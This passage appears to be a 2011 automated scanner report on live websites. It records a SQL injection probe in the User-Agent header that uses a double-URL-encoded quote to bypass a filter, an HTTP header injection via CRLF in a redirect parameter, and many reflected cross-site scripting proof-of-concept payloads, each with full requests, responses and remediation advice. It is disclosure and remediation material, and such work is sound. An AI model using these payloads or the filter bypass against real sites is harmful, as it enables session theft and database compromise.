The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
Request 1
GET /features/ HTTP/1.1
Host: www.spiceworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Response 1
HTTP/1.1 200 OK
Date: Wed, 26 Jan 2011 14:57:13 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: swcls=173.193.214.243.1296053833957570; path=/; domain=.spiceworks.com
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Google Website ...[SNIP]... <p class="testimonial">...If you're not using Spiceworks for your IT support, you're failing at IT!... —Don Mcgee, Sys Admin, Southwestern Michigan College</p> ...[SNIP]...
Request 2
GET /features/ HTTP/1.1
Host: www.spiceworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Response 2
HTTP/1.1 200 OK
Date: Wed, 26 Jan 2011 14:57:14 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: swcls=173.193.214.243.1296053834098236; path=/; domain=.spiceworks.com
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20550
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the url request parameter is copied into the Location response header. The payload 96bfd%0d%0ad5bb6e4fc22 was submitted in the url parameter. This caused a response containing an injected HTTP header.
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
Request
GET /click?sid=940&rqctid=6475&pos=1&lid=696567&cid=153413&pr=2&tstamp=20110126094929&iip=173.193.214.243&ltype=JSCR&lname=560x350v1&url=96bfd%0d%0ad5bb6e4fc22 HTTP/1.1
Host: links.industrybrains.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Object Moved
Connection: close
Date: Wed, 26 Jan 2011 14:56:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="CAO DSP COR CURa "
Location: 96bfd
d5bb6e4fc22
Content-Type: text/html
Set-Cookie: IBC1132967913=940@2@696567@153413@20110126095602@173.193.214.243;path=/sc/;expires=Monday, 25 July 2011 09:56:02 GMT;domain=IndustryBrains.com;
3. Cross-site scripting (reflected)
There are 132 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
3.1. http://businessintelligence.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://businessintelligence.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16b86'-alert(1)-'6a6fa7ccdab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?16b86'-alert(1)-'6a6fa7ccdab=1 HTTP/1.1
Host: businessintelligence.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79438
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bjqkbtz41tqi0tz1vwqauvui; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:38 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Business In ...[SNIP]... sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fbusinessintelligence.ittoolbox.com%2fDefault.aspx%3f16b86'-alert(1)-'6a6fa7ccdab%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.2. http://businessintelligence.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://businessintelligence.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ae76"style%3d"x%3aexpression(alert(1))"53ed7d380a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ae76"style="x:expression(alert(1))"53ed7d380a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?6ae76"style%3d"x%3aexpression(alert(1))"53ed7d380a0=1 HTTP/1.1
Host: businessintelligence.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79550
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=yv5ih0yuwac45q45l000zbqa; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:32 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Business In ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://businessintelligence.ittoolbox.com/Default.aspx?6ae76"style="x:expression(alert(1))"53ed7d380a0=1" /> ...[SNIP]...
3.3. http://c.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://c.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc95f"style%3d"x%3aexpression(alert(1))"2625c8d25b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc95f"style="x:expression(alert(1))"2625c8d25b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?fc95f"style%3d"x%3aexpression(alert(1))"2625c8d25b5=1 HTTP/1.1
Host: c.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73655
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=umajk545hmb1st451f0cu145; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:27 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> C Languages ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://c.ittoolbox.com/Default.aspx?fc95f"style="x:expression(alert(1))"2625c8d25b5=1" /> ...[SNIP]...
3.4. http://c.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://c.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14422'-alert(1)-'6b0fc08769a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?14422'-alert(1)-'6b0fc08769a=1 HTTP/1.1
Host: c.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73542
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=b0n14gf40bjjvn55mwg00vvm; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> C Languages ...[SNIP]... (sender != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fc.ittoolbox.com%2fDefault.aspx%3f14422'-alert(1)-'6b0fc08769a%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.5. http://cio.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://cio.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99172'-alert(1)-'cb720188f25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?99172'-alert(1)-'cb720188f25=1 HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70997
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=o3d0rzjtwft0qdf140t44su3; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:32 GMT
Connection: close
3.6. http://cio.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://cio.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c54c"style%3d"x%3aexpression(alert(1))"d1341797eaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c54c"style="x:expression(alert(1))"d1341797eaf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?3c54c"style%3d"x%3aexpression(alert(1))"d1341797eaf=1 HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71115
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=j3l54b45qxnbq2b5b15znt45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:28 GMT
Connection: close
3.7. http://cio.ittoolbox.com/events/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://cio.ittoolbox.com
Path: /events/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33953'-alert(1)-'e02096512e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /events/?33953'-alert(1)-'e02096512e=1 HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39061
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4b34uq55akkdny450wll2255; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:42 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fcio.ittoolbox.com%2fevents%2fdefault.aspx%3f33953'-alert(1)-'e02096512e%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.8. http://cio.ittoolbox.com/groups/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://cio.ittoolbox.com
Path: /groups/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c37ce'-alert(1)-'a7fd1789ef1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /groups/?c37ce'-alert(1)-'a7fd1789ef1=1 HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 131301
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=a3abyt3ubus1p2uuqjogce45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:56 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... & sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fcio.ittoolbox.com%2fgroups%2fdefault.aspx%3fc37ce'-alert(1)-'a7fd1789ef1%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.9. http://cio.ittoolbox.com/research/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://cio.ittoolbox.com
Path: /research/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33008'-alert(1)-'9d7f961f948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /research/?33008'-alert(1)-'9d7f961f948=1 HTTP/1.1
Host: cio.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 98082
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hkqgj0zgaipxtz45glhsdjap; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:12 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... nder != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fcio.ittoolbox.com%2fresearch%2fResearchSection.aspx%3f33008'-alert(1)-'9d7f961f948%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.10. http://cloud.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://cloud.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 840b5"style%3d"x%3aexpression(alert(1))"4766cc8d795 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 840b5"style="x:expression(alert(1))"4766cc8d795 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?840b5"style%3d"x%3aexpression(alert(1))"4766cc8d795=1 HTTP/1.1
Host: cloud.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 56254
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=d10qzl45hht5qz23fp4nsrfn; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:42 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://cloud.ittoolbox.com/Default.aspx?840b5"style="x:expression(alert(1))"4766cc8d795=1" /> ...[SNIP]...
3.11. http://cloud.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://cloud.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbf1a'-alert(1)-'3dbc9db0889 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cbf1a'-alert(1)-'3dbc9db0889=1 HTTP/1.1
Host: cloud.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 56139
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ywt53055nfjnwtydrpoywn55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:45 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... der != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fcloud.ittoolbox.com%2fDefault.aspx%3fcbf1a'-alert(1)-'3dbc9db0889%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.12. http://crm.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://crm.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ce50'-alert(1)-'dab597dca86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?3ce50'-alert(1)-'dab597dca86=1 HTTP/1.1
Host: crm.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 82857
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rof0n4454b3qd145w4ffjfy5; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:54 GMT
Connection: close
3.13. http://crm.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://crm.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f2fb"style%3d"x%3aexpression(alert(1))"9153b50ea5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1f2fb"style="x:expression(alert(1))"9153b50ea5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?1f2fb"style%3d"x%3aexpression(alert(1))"9153b50ea5c=1 HTTP/1.1
Host: crm.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 82972
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kh14sz45wwtcvn45mjmtr5jk; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:49 GMT
Connection: close
3.14. http://database.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://database.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10760'-alert(1)-'13abc61113d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
